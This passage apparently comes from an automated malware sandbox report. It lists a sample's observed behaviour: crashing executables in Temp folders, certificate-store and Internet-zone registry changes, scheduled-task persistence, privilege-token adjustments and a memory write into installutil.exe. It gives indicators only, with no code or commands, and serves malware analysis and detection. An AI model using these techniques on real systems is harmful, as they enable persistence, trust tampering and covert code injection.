N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2ad7b7-0000-0000-0000-d01200000000} C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2ad7b7-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
N/A N/A C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
